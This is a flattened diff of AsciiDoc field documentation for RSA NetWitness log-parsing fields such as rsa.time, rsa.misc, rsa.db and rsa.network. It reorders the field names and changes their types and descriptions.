+*`rsa.misc.cn_max_ttl`*:: + -- type: keyword -- -*`rsa.time.day`*:: +*`rsa.misc.cn_maxpcktlen`*:: + -- type: keyword -- -*`rsa.time.endtime`*:: +*`rsa.misc.cn_min_ttl`*:: + -- -This key is used to capture the End time mentioned in a session in a standard form - -type: date +type: keyword -- -*`rsa.time.timezone`*:: +*`rsa.misc.cn_minpcktlen`*:: + -- -This key is used to capture the timezone of the Event Time - type: keyword -- -*`rsa.time.duration_str`*:: +*`rsa.misc.cn_mpls_lbl_1`*:: + -- -A text string version of the duration - type: keyword -- -*`rsa.time.date`*:: +*`rsa.misc.cn_mpls_lbl_10`*:: + -- type: keyword -- -*`rsa.time.year`*:: +*`rsa.misc.cn_mpls_lbl_2`*:: + -- type: keyword -- -*`rsa.time.recorded_time`*:: +*`rsa.misc.cn_mpls_lbl_3`*:: + -- -The event time as recorded by the system the event is collected from. The usage scenario is a multi-tier application where the management layer of the system records it's own timestamp at the time of collection from its child nodes. Must be in timestamp format. - -type: date +type: keyword -- -*`rsa.time.datetime`*:: +*`rsa.misc.cn_mpls_lbl_4`*:: + -- type: keyword -- -*`rsa.time.effective_time`*:: +*`rsa.misc.cn_mpls_lbl_5`*:: + -- -This key is the effective time referenced by an individual event in a Standard Timestamp format - -type: date +type: keyword -- -*`rsa.time.expire_time`*:: +*`rsa.misc.cn_mpls_lbl_6`*:: + -- -This key is the timestamp that explicitly refers to an expiration. - -type: date +type: keyword -- -*`rsa.time.process_time`*:: +*`rsa.misc.cn_mpls_lbl_7`*:: + -- -Deprecated, use duration.time - type: keyword -- -*`rsa.time.hour`*:: +*`rsa.misc.cn_mpls_lbl_8`*:: + -- type: keyword -- -*`rsa.time.min`*:: +*`rsa.misc.cn_mpls_lbl_9`*:: + -- type: keyword -- -*`rsa.time.timestamp`*:: +*`rsa.misc.cn_mplstoplabel`*:: + -- type: keyword -- -*`rsa.time.event_queue_time`*:: +*`rsa.misc.cn_mplstoplabip`*:: + -- -This key is the Time that the event was queued. - -type: date +type: keyword -- -*`rsa.time.p_time1`*:: +*`rsa.misc.cn_mul_dst_byt`*:: + -- type: keyword -- -*`rsa.time.tzone`*:: +*`rsa.misc.cn_mul_dst_pks`*:: + -- type: keyword -- -*`rsa.time.eventtime`*:: +*`rsa.misc.cn_muligmptype`*:: + -- type: keyword -- -*`rsa.time.gmtdate`*:: +*`rsa.misc.cn_sampalgo`*:: + -- type: keyword -- -*`rsa.time.gmttime`*:: +*`rsa.misc.cn_sampint`*:: + -- type: keyword -- -*`rsa.time.p_date`*:: +*`rsa.misc.cn_seqctr`*:: + -- type: keyword -- -*`rsa.time.p_month`*:: +*`rsa.misc.cn_spackets`*:: + -- type: keyword -- -*`rsa.time.p_time`*:: +*`rsa.misc.cn_src_tos`*:: + -- type: keyword -- -*`rsa.time.p_time2`*:: +*`rsa.misc.cn_src_vlan`*:: + -- type: keyword -- -*`rsa.time.p_year`*:: +*`rsa.misc.cn_sysuptime`*:: + -- type: keyword -- -*`rsa.time.expire_time_str`*:: +*`rsa.misc.cn_template_id`*:: + -- -This key is used to capture incomplete timestamp that explicitly refers to an expiration. - type: keyword -- -*`rsa.time.stamp`*:: +*`rsa.misc.cn_totbytsexp`*:: + -- -Deprecated key defined only in table map. - -type: date +type: keyword -- - -*`rsa.misc.action`*:: +*`rsa.misc.cn_totflowexp`*:: + -- type: keyword -- -*`rsa.misc.result`*:: +*`rsa.misc.cn_totpcktsexp`*:: + -- -This key is used to capture the outcome/result string value of an action in a session. - type: keyword -- -*`rsa.misc.severity`*:: +*`rsa.misc.cn_unixnanosecs`*:: + -- -This key is used to capture the severity given the session - type: keyword -- -*`rsa.misc.event_type`*:: +*`rsa.misc.cn_v6flowlabel`*:: + -- -This key captures the event category type as specified by the event source. - type: keyword -- -*`rsa.misc.reference_id`*:: +*`rsa.misc.cn_v6optheaders`*:: + -- -This key is used to capture an event id from the session directly - type: keyword -- -*`rsa.misc.version`*:: +*`rsa.misc.comp_class`*:: + -- -This key captures Version of the application or OS which is generating the event. - type: keyword -- -*`rsa.misc.disposition`*:: +*`rsa.misc.comp_name`*:: + -- -This key captures the The end state of an action. - type: keyword -- -*`rsa.misc.result_code`*:: +*`rsa.misc.comp_rbytes`*:: + -- -This key is used to capture the outcome/result numeric value of an action in a session - type: keyword -- -*`rsa.misc.category`*:: +*`rsa.misc.comp_sbytes`*:: + -- -This key is used to capture the category of an event given by the vendor in the session - type: keyword -- -*`rsa.misc.obj_name`*:: +*`rsa.misc.cpu_data`*:: + -- -This is used to capture name of object - type: keyword -- -*`rsa.misc.obj_type`*:: +*`rsa.misc.criticality`*:: + -- -This is used to capture type of object - type: keyword -- -*`rsa.misc.event_source`*:: +*`rsa.misc.cs_agency_dst`*:: + -- -This key captures Source of the event that’s not a hostname - type: keyword -- -*`rsa.misc.log_session_id`*:: +*`rsa.misc.cs_analyzedby`*:: + -- -This key is used to capture a sessionid from the session directly - type: keyword -- -*`rsa.misc.group`*:: +*`rsa.misc.cs_av_other`*:: + -- -This key captures the Group Name value - type: keyword -- -*`rsa.misc.policy_name`*:: +*`rsa.misc.cs_av_primary`*:: + -- -This key is used to capture the Policy Name only. - type: keyword -- -*`rsa.misc.rule_name`*:: +*`rsa.misc.cs_av_secondary`*:: + -- -This key captures the Rule Name - type: keyword -- -*`rsa.misc.context`*:: +*`rsa.misc.cs_bgpv6nxthop`*:: + -- -This key captures Information which adds additional context to the event. - type: keyword -- -*`rsa.misc.change_new`*:: +*`rsa.misc.cs_bit9status`*:: + -- -This key is used to capture the new values of the attribute that’s changing in a session - type: keyword -- -*`rsa.misc.space`*:: +*`rsa.misc.cs_context`*:: + -- type: keyword -- -*`rsa.misc.client`*:: +*`rsa.misc.cs_control`*:: + -- -This key is used to capture only the name of the client application requesting resources of the server. See the user.agent meta key for capture of the specific user agent identifier or browser identification string. - type: keyword -- -*`rsa.misc.msgIdPart1`*:: +*`rsa.misc.cs_data`*:: + -- type: keyword -- -*`rsa.misc.msgIdPart2`*:: +*`rsa.misc.cs_datecret`*:: + -- type: keyword -- -*`rsa.misc.change_old`*:: +*`rsa.misc.cs_dst_tld`*:: + -- -This key is used to capture the old value of the attribute that’s changing in a session - type: keyword -- -*`rsa.misc.operation_id`*:: +*`rsa.misc.cs_eth_dst_ven`*:: + -- -An alert number or operation number. The values should be unique and non-repeating. - type: keyword -- -*`rsa.misc.event_state`*:: +*`rsa.misc.cs_eth_src_ven`*:: + -- -This key captures the current state of the object/item referenced within the event. Describing an on-going event. - type: keyword -- -*`rsa.misc.group_object`*:: +*`rsa.misc.cs_event_uuid`*:: + -- -This key captures a collection/grouping of entities. Specific usage - type: keyword -- -*`rsa.misc.node`*:: +*`rsa.misc.cs_filetype`*:: + -- -Common use case is the node name within a cluster. The cluster name is reflected by the host name. - type: keyword -- -*`rsa.misc.rule`*:: +*`rsa.misc.cs_fld`*:: + -- -This key captures the Rule number - type: keyword -- -*`rsa.misc.device_name`*:: +*`rsa.misc.cs_if_desc`*:: + -- -This is used to capture name of the Device associated with the node Like: a physical disk, printer, etc - type: keyword -- -*`rsa.misc.param`*:: +*`rsa.misc.cs_if_name`*:: + -- -This key is the parameters passed as part of a command or application, etc. - type: keyword -- -*`rsa.misc.change_attrib`*:: +*`rsa.misc.cs_ip_next_hop`*:: + -- -This key is used to capture the name of the attribute that’s changing in a session - type: keyword -- -*`rsa.misc.event_computer`*:: +*`rsa.misc.cs_ipv4dstpre`*:: + -- -This key is a windows only concept, where this key is used to capture fully qualified domain name in a windows log. - type: keyword -- -*`rsa.misc.reference_id1`*:: +*`rsa.misc.cs_ipv4srcpre`*:: + -- -This key is for Linked ID to be used as an addition to "reference.id" - type: keyword -- -*`rsa.misc.event_log`*:: +*`rsa.misc.cs_lifetime`*:: + -- -This key captures the Name of the event log - type: keyword -- -*`rsa.misc.OS`*:: +*`rsa.misc.cs_log_medium`*:: + -- -This key captures the Name of the Operating System - type: keyword -- -*`rsa.misc.terminal`*:: +*`rsa.misc.cs_loginname`*:: + -- -This key captures the Terminal Names only - type: keyword -- -*`rsa.misc.msgIdPart3`*:: +*`rsa.misc.cs_modulescore`*:: + -- type: keyword -- -*`rsa.misc.filter`*:: +*`rsa.misc.cs_modulesign`*:: + -- -This key captures Filter used to reduce result set - type: keyword -- -*`rsa.misc.serial_number`*:: +*`rsa.misc.cs_opswatresult`*:: + -- -This key is the Serial number associated with a physical asset. - type: keyword -- -*`rsa.misc.checksum`*:: +*`rsa.misc.cs_payload`*:: + -- -This key is used to capture the checksum or hash of the entity such as a file or process. Checksum should be used over checksum.src or checksum.dst when it is unclear whether the entity is a source or target of an action. - type: keyword -- -*`rsa.misc.event_user`*:: +*`rsa.misc.cs_registrant`*:: + -- -This key is a windows only concept, where this key is used to capture combination of domain name and username in a windows log. - type: keyword -- -*`rsa.misc.virusname`*:: +*`rsa.misc.cs_registrar`*:: + -- -This key captures the name of the virus - type: keyword -- -*`rsa.misc.content_type`*:: +*`rsa.misc.cs_represult`*:: + -- -This key is used to capture Content Type only. - type: keyword -- -*`rsa.misc.group_id`*:: +*`rsa.misc.cs_rpayload`*:: + -- -This key captures Group ID Number (related to the group name) - type: keyword -- -*`rsa.misc.policy_id`*:: +*`rsa.misc.cs_sampler_name`*:: + -- -This key is used to capture the Policy ID only, this should be a numeric value, use policy.name otherwise - type: keyword -- -*`rsa.misc.vsys`*:: +*`rsa.misc.cs_sourcemodule`*:: + -- -This key captures Virtual System Name - type: keyword -- -*`rsa.misc.connection_id`*:: +*`rsa.misc.cs_streams`*:: + -- -This key captures the Connection ID - type: keyword -- -*`rsa.misc.reference_id2`*:: +*`rsa.misc.cs_targetmodule`*:: + -- -This key is for the 2nd Linked ID. Can be either linked to "reference.id" or "reference.id1" value but should not be used unless the other two variables are in play. - type: keyword -- -*`rsa.misc.sensor`*:: +*`rsa.misc.cs_v6nxthop`*:: + -- -This key captures Name of the sensor. Typically used in IDS/IPS based devices - type: keyword -- -*`rsa.misc.sig_id`*:: +*`rsa.misc.cs_whois_server`*:: + -- -This key captures IDS/IPS Int Signature ID - -type: long +type: keyword -- -*`rsa.misc.port_name`*:: +*`rsa.misc.cs_yararesult`*:: + -- -This key is used for Physical or logical port connection but does NOT include a network port. (Example: Printer port name). - type: keyword -- -*`rsa.misc.rule_group`*:: +*`rsa.misc.description`*:: + -- -This key captures the Rule group name - type: keyword -- -*`rsa.misc.risk_num`*:: +*`rsa.misc.devvendor`*:: + -- -This key captures a Numeric Risk value - -type: double +type: keyword -- -*`rsa.misc.trigger_val`*:: +*`rsa.misc.distance`*:: + -- -This key captures the Value of the trigger or threshold condition. - type: keyword -- -*`rsa.misc.log_session_id1`*:: +*`rsa.misc.dstburb`*:: + -- -This key is used to capture a Linked (Related) Session ID from the session directly - type: keyword -- -*`rsa.misc.comp_version`*:: +*`rsa.misc.edomain`*:: + -- -This key captures the Version level of a sub-component of a product. - type: keyword -- -*`rsa.misc.content_version`*:: +*`rsa.misc.edomaub`*:: + -- -This key captures Version level of a signature or database content. - type: keyword -- -*`rsa.misc.hardware_id`*:: +*`rsa.misc.euid`*:: + -- -This key is used to capture unique identifier for a device or system (NOT a Mac address) - type: keyword -- -*`rsa.misc.risk`*:: +*`rsa.misc.facility`*:: + -- -This key captures the non-numeric risk value - type: keyword -- -*`rsa.misc.event_id`*:: +*`rsa.misc.finterface`*:: + -- type: keyword -- -*`rsa.misc.reason`*:: +*`rsa.misc.flags`*:: + -- type: keyword -- -*`rsa.misc.status`*:: +*`rsa.misc.gaddr`*:: + -- type: keyword -- -*`rsa.misc.mail_id`*:: +*`rsa.misc.id3`*:: + -- -This key is used to capture the mailbox id/name - type: keyword -- -*`rsa.misc.rule_uid`*:: +*`rsa.misc.im_buddyname`*:: + -- -This key is the Unique Identifier for a rule. - type: keyword -- -*`rsa.misc.trigger_desc`*:: +*`rsa.misc.im_croomid`*:: + -- -This key captures the Description of the trigger or threshold condition. - type: keyword -- -*`rsa.misc.inout`*:: +*`rsa.misc.im_croomtype`*:: + -- type: keyword -- -*`rsa.misc.p_msgid`*:: +*`rsa.misc.im_members`*:: + -- type: keyword -- -*`rsa.misc.data_type`*:: +*`rsa.misc.im_username`*:: + -- type: keyword -- -*`rsa.misc.msgIdPart4`*:: +*`rsa.misc.ipkt`*:: + -- type: keyword -- -*`rsa.misc.error`*:: +*`rsa.misc.ipscat`*:: + -- -This key captures All non successful Error codes or responses - type: keyword -- -*`rsa.misc.index`*:: +*`rsa.misc.ipspri`*:: + -- type: keyword -- -*`rsa.misc.listnum`*:: +*`rsa.misc.latitude`*:: + -- -This key is used to capture listname or listnumber, primarily for collecting access-list - type: keyword -- -*`rsa.misc.ntype`*:: +*`rsa.misc.linenum`*:: + -- type: keyword -- -*`rsa.misc.observed_val`*:: +*`rsa.misc.list_name`*:: + -- -This key captures the Value observed (from the perspective of the device generating the log). - type: keyword -- -*`rsa.misc.policy_value`*:: +*`rsa.misc.load_data`*:: + -- -This key captures the contents of the policy. This contains details about the policy - type: keyword -- -*`rsa.misc.pool_name`*:: +*`rsa.misc.location_floor`*:: + -- -This key captures the name of a resource pool - type: keyword -- -*`rsa.misc.rule_template`*:: +*`rsa.misc.location_mark`*:: + -- -A default set of parameters which are overlayed onto a rule (or rulename) which efffectively constitutes a template - type: keyword -- -*`rsa.misc.count`*:: +*`rsa.misc.log_id`*:: + -- type: keyword -- -*`rsa.misc.number`*:: +*`rsa.misc.log_type`*:: + -- type: keyword -- -*`rsa.misc.sigcat`*:: +*`rsa.misc.logid`*:: + -- type: keyword -- -*`rsa.misc.type`*:: +*`rsa.misc.logip`*:: + -- type: keyword -- -*`rsa.misc.comments`*:: +*`rsa.misc.logname`*:: + -- -Comment information provided in the log message - type: keyword -- -*`rsa.misc.doc_number`*:: +*`rsa.misc.longitude`*:: + -- -This key captures File Identification number - -type: long +type: keyword -- -*`rsa.misc.expected_val`*:: +*`rsa.misc.lport`*:: + -- -This key captures the Value expected (from the perspective of the device generating the log). - type: keyword -- -*`rsa.misc.job_num`*:: +*`rsa.misc.mbug_data`*:: + -- -This key captures the Job Number - type: keyword -- -*`rsa.misc.spi_dst`*:: +*`rsa.misc.misc_name`*:: + -- -Destination SPI Index - type: keyword -- -*`rsa.misc.spi_src`*:: +*`rsa.misc.msg_type`*:: + -- -Source SPI Index - type: keyword -- -*`rsa.misc.code`*:: +*`rsa.misc.msgid`*:: + -- type: keyword -- -*`rsa.misc.agent_id`*:: +*`rsa.misc.netsessid`*:: + -- -This key is used to capture agent id - type: keyword -- -*`rsa.misc.message_body`*:: +*`rsa.misc.num`*:: + -- -This key captures the The contents of the message body. - type: keyword -- -*`rsa.misc.phone`*:: +*`rsa.misc.number1`*:: + -- type: keyword -- -*`rsa.misc.sig_id_str`*:: +*`rsa.misc.number2`*:: + -- -This key captures a string object of the sigid variable. - type: keyword -- -*`rsa.misc.cmd`*:: +*`rsa.misc.nwwn`*:: + -- type: keyword -- -*`rsa.misc.misc`*:: +*`rsa.misc.object`*:: + -- type: keyword -- -*`rsa.misc.name`*:: +*`rsa.misc.operation`*:: + -- type: keyword -- -*`rsa.misc.cpu`*:: +*`rsa.misc.opkt`*:: + -- -This key is the CPU time used in the execution of the event being recorded. - -type: long +type: keyword -- -*`rsa.misc.event_desc`*:: +*`rsa.misc.orig_from`*:: + -- -This key is used to capture a description of an event available directly or inferred - type: keyword -- -*`rsa.misc.sig_id1`*:: +*`rsa.misc.owner_id`*:: + -- -This key captures IDS/IPS Int Signature ID. This must be linked to the sig.id - -type: long +type: keyword -- -*`rsa.misc.im_buddyid`*:: +*`rsa.misc.p_action`*:: + -- type: keyword -- -*`rsa.misc.im_client`*:: +*`rsa.misc.p_filter`*:: + -- type: keyword -- -*`rsa.misc.im_userid`*:: +*`rsa.misc.p_group_object`*:: + -- type: keyword -- -*`rsa.misc.pid`*:: +*`rsa.misc.p_id`*:: + -- type: keyword -- -*`rsa.misc.priority`*:: +*`rsa.misc.p_msgid1`*:: + -- type: keyword -- -*`rsa.misc.context_subject`*:: +*`rsa.misc.p_msgid2`*:: + -- -This key is to be used in an audit context where the subject is the object being identified - type: keyword -- -*`rsa.misc.context_target`*:: +*`rsa.misc.p_result1`*:: + -- type: keyword -- -*`rsa.misc.cve`*:: +*`rsa.misc.password_chg`*:: + -- -This key captures CVE (Common Vulnerabilities and Exposures) - an identifier for known information security vulnerabilities. - type: keyword -- -*`rsa.misc.fcatnum`*:: +*`rsa.misc.password_expire`*:: + -- -This key captures Filter Category Number. Legacy Usage - type: keyword -- -*`rsa.misc.library`*:: +*`rsa.misc.permgranted`*:: + -- -This key is used to capture library information in mainframe devices - type: keyword -- -*`rsa.misc.parent_node`*:: +*`rsa.misc.permwanted`*:: + -- -This key captures the Parent Node Name. Must be related to node variable. - type: keyword -- -*`rsa.misc.risk_info`*:: +*`rsa.misc.pgid`*:: + -- -Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) - type: keyword -- -*`rsa.misc.tcp_flags`*:: +*`rsa.misc.policyUUID`*:: + -- -This key is captures the TCP flags set in any packet of session - -type: long +type: keyword -- -*`rsa.misc.tos`*:: +*`rsa.misc.prog_asp_num`*:: + -- -This key describes the type of service - -type: long +type: keyword -- -*`rsa.misc.vm_target`*:: +*`rsa.misc.program`*:: + -- -VMWare Target **VMWARE** only varaible. - type: keyword -- -*`rsa.misc.workspace`*:: +*`rsa.misc.real_data`*:: + -- -This key captures Workspace Description - type: keyword -- -*`rsa.misc.command`*:: +*`rsa.misc.rec_asp_device`*:: + -- type: keyword -- -*`rsa.misc.event_category`*:: +*`rsa.misc.rec_asp_num`*:: + -- type: keyword -- -*`rsa.misc.facilityname`*:: +*`rsa.misc.rec_library`*:: + -- type: keyword -- -*`rsa.misc.forensic_info`*:: +*`rsa.misc.recordnum`*:: + -- type: keyword -- -*`rsa.misc.jobname`*:: +*`rsa.misc.ruid`*:: + -- type: keyword -- -*`rsa.misc.mode`*:: +*`rsa.misc.sburb`*:: + -- type: keyword -- -*`rsa.misc.policy`*:: +*`rsa.misc.sdomain_fld`*:: + -- type: keyword -- -*`rsa.misc.policy_waiver`*:: +*`rsa.misc.sec`*:: + -- type: keyword -- -*`rsa.misc.second`*:: +*`rsa.misc.sensorname`*:: + -- type: keyword -- -*`rsa.misc.space1`*:: +*`rsa.misc.seqnum`*:: + -- type: keyword -- -*`rsa.misc.subcategory`*:: +*`rsa.misc.session`*:: + -- type: keyword -- -*`rsa.misc.tbdstr2`*:: +*`rsa.misc.sessiontype`*:: + -- type: keyword -- -*`rsa.misc.alert_id`*:: +*`rsa.misc.sigUUID`*:: + -- -Deprecated, New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) - type: keyword -- -*`rsa.misc.checksum_dst`*:: +*`rsa.misc.spi`*:: + -- -This key is used to capture the checksum or hash of the the target entity such as a process or file. - type: keyword -- -*`rsa.misc.checksum_src`*:: +*`rsa.misc.srcburb`*:: + -- -This key is used to capture the checksum or hash of the source entity such as a file or process. - type: keyword -- -*`rsa.misc.fresult`*:: +*`rsa.misc.srcdom`*:: + -- -This key captures the Filter Result - -type: long +type: keyword -- -*`rsa.misc.payload_dst`*:: +*`rsa.misc.srcservice`*:: + -- -This key is used to capture destination payload - type: keyword -- -*`rsa.misc.payload_src`*:: +*`rsa.misc.state`*:: + -- -This key is used to capture source payload - type: keyword -- -*`rsa.misc.pool_id`*:: +*`rsa.misc.status1`*:: + -- -This key captures the identifier (typically numeric field) of a resource pool - type: keyword -- -*`rsa.misc.process_id_val`*:: +*`rsa.misc.svcno`*:: + -- -This key is a failure key for Process ID when it is not an integer value - type: keyword -- -*`rsa.misc.risk_num_comm`*:: +*`rsa.misc.system`*:: + -- -This key captures Risk Number Community - -type: double +type: keyword -- -*`rsa.misc.risk_num_next`*:: +*`rsa.misc.tbdstr1`*:: + -- -This key captures Risk Number NextGen - -type: double +type: keyword -- -*`rsa.misc.risk_num_sand`*:: +*`rsa.misc.tgtdom`*:: + -- -This key captures Risk Number SandBox - -type: double +type: keyword -- -*`rsa.misc.risk_num_static`*:: +*`rsa.misc.tgtdomain`*:: + -- -This key captures Risk Number Static - -type: double +type: keyword -- -*`rsa.misc.risk_suspicious`*:: +*`rsa.misc.threshold`*:: + -- -Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) - type: keyword -- -*`rsa.misc.risk_warning`*:: +*`rsa.misc.type1`*:: + -- -Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) - type: keyword -- -*`rsa.misc.snmp_oid`*:: +*`rsa.misc.udb_class`*:: + -- -SNMP Object Identifier - type: keyword -- -*`rsa.misc.sql`*:: +*`rsa.misc.url_fld`*:: + -- -This key captures the SQL query - type: keyword -- -*`rsa.misc.vuln_ref`*:: +*`rsa.misc.user_div`*:: + -- -This key captures the Vulnerability Reference details - type: keyword -- -*`rsa.misc.acl_id`*:: +*`rsa.misc.userid`*:: + -- type: keyword -- -*`rsa.misc.acl_op`*:: +*`rsa.misc.username_fld`*:: + -- type: keyword -- -*`rsa.misc.acl_pos`*:: +*`rsa.misc.utcstamp`*:: + -- type: keyword -- -*`rsa.misc.acl_table`*:: +*`rsa.misc.v_instafname`*:: + -- type: keyword -- -*`rsa.misc.admin`*:: +*`rsa.misc.virt_data`*:: + -- type: keyword -- -*`rsa.misc.alarm_id`*:: +*`rsa.misc.vpnid`*:: + -- type: keyword -- -*`rsa.misc.alarmname`*:: +*`rsa.misc.autorun_type`*:: + -- +This is used to capture Auto Run type + type: keyword -- -*`rsa.misc.app_id`*:: +*`rsa.misc.cc_number`*:: + -- -type: keyword +Valid Credit Card Numbers only + +type: long -- -*`rsa.misc.audit`*:: +*`rsa.misc.content`*:: + -- +This key captures the content type from protocol headers + type: keyword -- -*`rsa.misc.audit_object`*:: +*`rsa.misc.ein_number`*:: + -- -type: keyword +Employee Identification Numbers only + +type: long -- -*`rsa.misc.auditdata`*:: +*`rsa.misc.found`*:: + -- +This is used to capture the results of regex match + type: keyword -- -*`rsa.misc.benchmark`*:: +*`rsa.misc.language`*:: + -- +This is used to capture list of languages the client support and what it prefers + type: keyword -- -*`rsa.misc.bypass`*:: +*`rsa.misc.lifetime`*:: + -- -type: keyword +This key is used to capture the session lifetime in seconds. + +type: long -- -*`rsa.misc.cache`*:: +*`rsa.misc.link`*:: + -- +This key is used to link the sessions together. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + type: keyword -- -*`rsa.misc.cache_hit`*:: +*`rsa.misc.match`*:: + -- +This key is for regex match name from search.ini + type: keyword -- -*`rsa.misc.cefversion`*:: +*`rsa.misc.param_dst`*:: + -- +This key captures the command line/launch argument of the target process or file + type: keyword -- -*`rsa.misc.cfg_attr`*:: +*`rsa.misc.param_src`*:: + -- +This key captures source parameter + type: keyword -- -*`rsa.misc.cfg_obj`*:: +*`rsa.misc.search_text`*:: + -- +This key captures the Search Text used + type: keyword -- -*`rsa.misc.cfg_path`*:: +*`rsa.misc.sig_name`*:: + -- +This key is used to capture the Signature Name only. + type: keyword -- -*`rsa.misc.changes`*:: +*`rsa.misc.snmp_value`*:: + -- +SNMP set request value + type: keyword -- -*`rsa.misc.client_ip`*:: +*`rsa.misc.streams`*:: + -- -type: keyword +This key captures number of streams in session + +type: long -- -*`rsa.misc.clustermembers`*:: + +*`rsa.db.index`*:: + -- +This key captures IndexID of the index. + type: keyword -- -*`rsa.misc.cn_acttimeout`*:: +*`rsa.db.instance`*:: + -- +This key is used to capture the database server instance name + type: keyword -- -*`rsa.misc.cn_asn_src`*:: +*`rsa.db.database`*:: + -- +This key is used to capture the name of a database or an instance as seen in a session + type: keyword -- -*`rsa.misc.cn_bgpv4nxthop`*:: +*`rsa.db.transact_id`*:: + -- +This key captures the SQL transantion ID of the current session + type: keyword -- -*`rsa.misc.cn_ctr_dst_code`*:: +*`rsa.db.permissions`*:: + -- +This key captures permission or privilege level assigned to a resource. + type: keyword -- -*`rsa.misc.cn_dst_tos`*:: +*`rsa.db.table_name`*:: + -- +This key is used to capture the table name + type: keyword -- -*`rsa.misc.cn_dst_vlan`*:: +*`rsa.db.db_id`*:: + -- +This key is used to capture the unique identifier for a database + type: keyword -- -*`rsa.misc.cn_engine_id`*:: +*`rsa.db.db_pid`*:: + -- -type: keyword +This key captures the process id of a connection with database server + +type: long -- -*`rsa.misc.cn_engine_type`*:: +*`rsa.db.lread`*:: + -- -type: keyword +This key is used for the number of logical reads + +type: long -- -*`rsa.misc.cn_f_switch`*:: +*`rsa.db.lwrite`*:: + -- -type: keyword +This key is used for the number of logical writes + +type: long -- -*`rsa.misc.cn_flowsampid`*:: +*`rsa.db.pread`*:: + -- -type: keyword +This key is used for the number of physical writes + +type: long -- -*`rsa.misc.cn_flowsampintv`*:: + +*`rsa.network.alias_host`*:: + -- +This key should be used when the source or destination context of a hostname is not clear.Also it captures the Device Hostname. Any Hostname that isnt ad.computer. + type: keyword -- -*`rsa.misc.cn_flowsampmode`*:: +*`rsa.network.domain`*:: + -- type: keyword -- -*`rsa.misc.cn_inacttimeout`*:: +*`rsa.network.host_dst`*:: + -- +This key should only be used when it’s a Destination Hostname + type: keyword -- -*`rsa.misc.cn_inpermbyts`*:: +*`rsa.network.network_service`*:: + -- +This is used to capture layer 7 protocols/service names + type: keyword -- -*`rsa.misc.cn_inpermpckts`*:: +*`rsa.network.interface`*:: + -- +This key should be used when the source or destination context of an interface is not clear + type: keyword -- -*`rsa.misc.cn_invalid`*:: +*`rsa.network.network_port`*:: + -- -type: keyword +Deprecated, use port. NOTE: There is a type discrepancy as currently used, TM: Int32, INDEX: UInt64 (why neither chose the correct UInt16?!) + +type: long -- -*`rsa.misc.cn_ip_proto_ver`*:: +*`rsa.network.eth_host`*:: + -- +Deprecated, use alias.mac + type: keyword -- -*`rsa.misc.cn_ipv4_ident`*:: +*`rsa.network.sinterface`*:: + -- +This key should only be used when it’s a Source Interface + type: keyword -- -*`rsa.misc.cn_l_switch`*:: +*`rsa.network.dinterface`*:: + -- +This key should only be used when it’s a Destination Interface + type: keyword -- -*`rsa.misc.cn_log_did`*:: +*`rsa.network.vlan`*:: + -- -type: keyword +This key should only be used to capture the ID of the Virtual LAN + +type: long -- -*`rsa.misc.cn_log_rid`*:: +*`rsa.network.zone_src`*:: + -- +This key should only be used when it’s a Source Zone. + type: keyword -- -*`rsa.misc.cn_max_ttl`*:: +*`rsa.network.zone`*:: + -- +This key should be used when the source or destination context of a Zone is not clear + type: keyword -- -*`rsa.misc.cn_maxpcktlen`*:: +*`rsa.network.zone_dst`*:: + -- +This key should only be used when it’s a Destination Zone. + type: keyword -- -*`rsa.misc.cn_min_ttl`*:: +*`rsa.network.gateway`*:: + -- +This key is used to capture the IP Address of the gateway + type: keyword -- -*`rsa.misc.cn_minpcktlen`*:: +*`rsa.network.icmp_type`*:: + -- -type: keyword +This key is used to capture the ICMP type only + +type: long -- -*`rsa.misc.cn_mpls_lbl_1`*:: +*`rsa.network.mask`*:: + -- +This key is used to capture the device network IPmask. + type: keyword -- -*`rsa.misc.cn_mpls_lbl_10`*:: +*`rsa.network.icmp_code`*:: + -- -type: keyword +This key is used to capture the ICMP code only + +type: long -- -*`rsa.misc.cn_mpls_lbl_2`*:: +*`rsa.network.protocol_detail`*:: + -- +This key should be used to capture additional protocol information + type: keyword -- -*`rsa.misc.cn_mpls_lbl_3`*:: +*`rsa.network.dmask`*:: + -- +This key is used for Destionation Device network mask + type: keyword -- -*`rsa.misc.cn_mpls_lbl_4`*:: +*`rsa.network.port`*:: + -- -type: keyword +This key should only be used to capture a Network Port when the directionality is not clear + +type: long -- -*`rsa.misc.cn_mpls_lbl_5`*:: +*`rsa.network.smask`*:: + -- +This key is used for capturing source Network Mask + type: keyword -- -*`rsa.misc.cn_mpls_lbl_6`*:: +*`rsa.network.netname`*:: + -- +This key is used to capture the network name associated with an IP range. This is configured by the end user. + type: keyword -- -*`rsa.misc.cn_mpls_lbl_7`*:: +*`rsa.network.paddr`*:: + -- -type: keyword +Deprecated + +type: ip -- -*`rsa.misc.cn_mpls_lbl_8`*:: +*`rsa.network.faddr`*:: + -- type: keyword -- -*`rsa.misc.cn_mpls_lbl_9`*:: +*`rsa.network.lhost`*:: + -- type: keyword -- -*`rsa.misc.cn_mplstoplabel`*:: +*`rsa.network.origin`*:: + -- type: keyword -- -*`rsa.misc.cn_mplstoplabip`*:: +*`rsa.network.remote_domain_id`*:: + -- type: keyword -- -*`rsa.misc.cn_mul_dst_byt`*:: +*`rsa.network.addr`*:: + -- type: keyword -- -*`rsa.misc.cn_mul_dst_pks`*:: +*`rsa.network.dns_a_record`*:: + -- type: keyword -- -*`rsa.misc.cn_muligmptype`*:: +*`rsa.network.dns_ptr_record`*:: + -- type: keyword -- -*`rsa.misc.cn_sampalgo`*:: +*`rsa.network.fhost`*:: + -- type: keyword -- -*`rsa.misc.cn_sampint`*:: +*`rsa.network.fport`*:: + -- type: keyword -- -*`rsa.misc.cn_seqctr`*:: +*`rsa.network.laddr`*:: + -- type: keyword -- -*`rsa.misc.cn_spackets`*:: +*`rsa.network.linterface`*:: + -- type: keyword -- -*`rsa.misc.cn_src_tos`*:: +*`rsa.network.phost`*:: + -- type: keyword -- -*`rsa.misc.cn_src_vlan`*:: +*`rsa.network.ad_computer_dst`*:: + -- +Deprecated, use host.dst + type: keyword -- -*`rsa.misc.cn_sysuptime`*:: +*`rsa.network.eth_type`*:: + -- -type: keyword +This key is used to capture Ethernet Type, Used for Layer 3 Protocols Only + +type: long -- -*`rsa.misc.cn_template_id`*:: +*`rsa.network.ip_proto`*:: + -- -type: keyword +This key should be used to capture the Protocol number, all the protocol nubers are converted into string in UI + 